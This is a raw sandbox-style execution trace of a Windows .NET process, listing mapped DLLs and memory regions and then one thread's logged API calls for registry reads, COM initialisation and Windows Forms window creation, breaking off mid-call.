"\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll") Region: id = 2246 start_va = 0x76c50000 end_va = 0x76d6efff monitored = 0 entry_point = 0x76c95980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2248 start_va = 0x6b980000 end_va = 0x6baeafff monitored = 0 entry_point = 0x6b9ee360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 2249 start_va = 0x4a30000 end_va = 0x4abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 2252 start_va = 0x4a30000 end_va = 0x4a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 2253 start_va = 0x4ab0000 end_va = 0x4abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 2254 start_va = 0x4ac0000 end_va = 0x4bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 2255 start_va = 0x70fc0000 end_va = 0x711b0fff monitored = 0 entry_point = 0x710a3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 2258 start_va = 0x4bc0000 end_va = 0x4c08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 2259 start_va = 0xbd0000 end_va = 0xbd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2260 start_va = 0x4c10000 end_va = 0x5c0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 2261 start_va = 0x2260000 end_va = 0x2263fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2262 start_va = 0x5c10000 end_va = 0x5d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c10000" filename = "" Region: id = 2263 start_va = 0x5d10000 end_va = 0x5e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 2264 start_va = 0x5e10000 end_va = 0x6301fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e10000" filename = "" Region: id = 2281 start_va = 0x5e10000 end_va = 0x5e71fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 2283 start_va = 0x2270000 end_va = 0x2280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 2287 start_va = 0x22e0000 end_va = 0x22fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022e0000" filename = "" Region: id = 2288 start_va = 0x7f690000 end_va = 0x7f6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f690000" filename = "" Region: id = 2289 start_va = 0x7f680000 end_va = 0x7f68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f680000" filename = "" Region: id = 2290 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2291 start_va = 0x4a70000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 2292 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2293 start_va = 0x4a70000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 2294 start_va = 0x4a80000 end_va = 0x4a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 2295 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2296 start_va = 0x4a70000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 2297 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 2298 start_va = 0x5f80000 end_va = 0x6f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 2299 start_va = 0x6f80000 end_va = 0x70dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f80000" filename = "" Region: id = 2302 start_va = 0x70e0000 end_va = 0x80dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070e0000" filename = "" Region: id = 2303 start_va = 0x80e0000 end_va = 0x838ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080e0000" filename = "" Region: id = 2304 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2305 start_va = 0x8390000 end_va = 0x839ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 2307 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2308 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2309 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2314 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2315 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2316 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2317 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2318 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2319 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2320 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2321 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2325 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2328 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2329 start_va = 0x5d0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2330 start_va = 0x6b800000 end_va = 0x6b972fff monitored = 0 entry_point = 0x6b8ad220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 2331 start_va = 0x5e80000 end_va = 0x5f4cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 2332 start_va = 0x650000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2333 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2334 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 2335 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2336 start_va = 0x8390000 end_va = 0x83ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 2339 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2340 start_va = 0x2180000 end_va = 0x21dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 2341 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2342 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2343 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 2344 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2345 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2346 start_va = 0x83f0000 end_va = 0x93effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083f0000" filename = "" Region: id = 2347 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2348 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 2349 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2350 start_va = 0x93f0000 end_va = 0xa3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 2352 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2353 start_va = 0xa3f0000 end_va = 0xa4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3f0000" filename = "" Region: id = 2354 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2355 start_va = 0xa590000 end_va = 0xa62bfff monitored = 1 entry_point = 0xa61e9a6 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 2356 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 2357 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2358 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2359 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2360 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2361 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2362 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2363 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2364 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2365 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2366 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2367 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2368 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2369 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2370 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2371 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2372 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2373 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2374 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2375 start_va = 0x4a70000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 2376 start_va = 0xa630000 end_va = 0xa72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a630000" filename = "" Region: id = 2377 start_va = 0x5f50000 end_va = 0x604ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 2378 start_va = 0x74bf0000 end_va = 0x75feefff monitored = 0 entry_point = 0x74dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2379 start_va = 0x76d70000 end_va = 0x76da6fff monitored = 0 entry_point = 0x76d73b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2380 start_va = 0x6050000 end_va = 0x608ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006050000" filename = "" Region: id = 2381 start_va = 0x6090000 end_va = 0x618ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 2382 start_va = 0x76430000 end_va = 0x76928fff monitored = 0 entry_point = 0x76637610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 2383 start_va = 0x76230000 end_va = 0x762bcfff monitored = 0 entry_point = 0x76279b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2384 start_va = 0x76e70000 end_va = 0x76eb3fff monitored = 0 entry_point = 0x76e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2385 start_va = 0x769c0000 end_va = 0x769cefff monitored = 0 entry_point = 0x769c2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2386 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2387 start_va = 0x6b7d0000 end_va = 0x6b7f7fff monitored = 0 entry_point = 0x6b7d7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2388 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2389 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2390 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2391 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2392 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2393 start_va = 0x6b750000 end_va = 0x6b7c0fff monitored = 0 entry_point = 0x6b7a69e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 2394 start_va = 0x70250000 end_va = 0x70317fff monitored = 0 entry_point = 0x702bae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 2395 start_va = 0x6b700000 end_va = 0x6b748fff monitored = 0 entry_point = 0x6b706450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 2396 start_va = 0x6190000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006190000" filename = "" Region: id = 2397 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2399 start_va = 0x700b0000 end_va = 0x701fafff monitored = 0 entry_point = 0x70111660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2400 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 2401 start_va = 0x62d0000 end_va = 0x63cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 2402 start_va = 0x2200000 end_va = 0x2200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 2403 start_va = 0x77110000 end_va = 0x77193fff monitored = 0 entry_point = 0x77136220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2404 start_va = 0x6eb00000 end_va = 0x6ed1bfff monitored = 0 entry_point = 0x6eccbc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 2405 start_va = 0x2210000 end_va = 0x2210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002210000" filename = "" Region: id = 2406 start_va = 0x63d0000 end_va = 0x640ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063d0000" filename = "" Region: id = 2407 start_va = 0x6410000 end_va = 0x650ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 2408 start_va = 0x2300000 end_va = 0x2303fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2409 start_va = 0x6510000 end_va = 0x6554fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 2410 start_va = 0x6560000 end_va = 0x6563fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2411 start_va = 0x6570000 end_va = 0x65fdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2412 start_va = 0x6600000 end_va = 0x663ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 2413 start_va = 0x6640000 end_va = 0x673ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006640000" filename = "" Region: id = 2414 start_va = 0x6740000 end_va = 0x6750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 2415 start_va = 0x6760000 end_va = 0x6763fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2416 start_va = 0x6770000 end_va = 0x6784fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001b.db") Region: id = 2417 start_va = 0x6790000 end_va = 0x6790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006790000" filename = "" Region: id = 2418 start_va = 0x71bd0000 end_va = 0x71d4dfff monitored = 0 entry_point = 0x71c4c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2419 start_va = 0x73f30000 end_va = 0x741fafff monitored = 0 entry_point = 0x7416c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2420 start_va = 0x6760000 end_va = 0x6760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006760000" filename = "" Region: id = 2551 start_va = 0x67a0000 end_va = 0x67affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067a0000" filename = "" Region: id = 2552 start_va = 0x67b0000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067b0000" filename = "" Region: id = 2553 start_va = 0x67c0000 end_va = 0x67cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 2643 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2644 start_va = 0x67a0000 end_va = 0x689ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067a0000" filename = "" Region: id = 2645 start_va = 0x68a0000 end_va = 0x68dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068a0000" filename = "" Region: id = 2646 start_va = 0x68e0000 end_va = 0x69dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068e0000" filename = "" Thread: id = 150 os_tid = 0xe4c [0182.892] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0183.987] RoInitialize () returned 0x1 [0183.988] RoUninitialize () returned 0x0 [0195.425] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da78 | out: phkResult=0x18da78*=0x0) returned 0x2 [0195.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x18eaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0195.583] IsAppThemed () returned 0x1 [0195.691] CoTaskMemAlloc (cb=0xf0) returned 0x9544b0 [0195.691] CreateActCtxA (pActCtx=0x18f034) returned 0x964a44 [0196.645] CoTaskMemFree (pv=0x9544b0) [0198.219] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1d7 [0198.220] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc242 [0199.328] GetSystemMetrics (nIndex=75) returned 1 [0199.336] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0199.341] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6ed30000 [0200.588] AdjustWindowRectEx (in: lpRect=0x18f080, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x18f080) returned 1 [0200.591] GetCurrentProcess () returned 0xffffffff [0200.591] GetCurrentThread () returned 0xfffffffe [0200.591] GetCurrentProcess () returned 0xffffffff [0200.591] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x18ef98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18ef98*=0x270) returned 1 [0200.594] GetCurrentThreadId () returned 0xe4c [0200.817] GetCurrentActCtx (in: lphActCtx=0x18eef8 | out: lphActCtx=0x18eef8*=0x0) returned 1 [0200.817] ActivateActCtx (in: hActCtx=0x964a44, lpCookie=0x18ef08 | out: hActCtx=0x964a44, lpCookie=0x18ef08) returned 1 [0200.818] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0200.824] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73180000 [0200.890] GetModuleHandleW (lpModuleName="user32.dll") returned 0x77580000 [0200.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x18edbc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWÄlÐ~\x09", lpUsedDefaultChar=0x0) returned 14 [0200.891] GetProcAddress (hModule=0x77580000, lpProcName="DefWindowProcW") returned 0x744f07e0 [0200.892] GetStockObject (i=5) returned 0x1900015 [0200.895] GetModuleHandleW (lpModuleName=0x0) returned 0x4f0000 [0200.901] CoTaskMemAlloc (cb=0x5c) returned 0x95f568 [0200.901] RegisterClassW (lpWndClass=0x18edac) returned 0xc243 [0200.901] CoTaskMemFree (pv=0x95f568) [0200.902] GetModuleHandleW (lpModuleName=0x0) returned 0x4f0000 [0200.902] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, 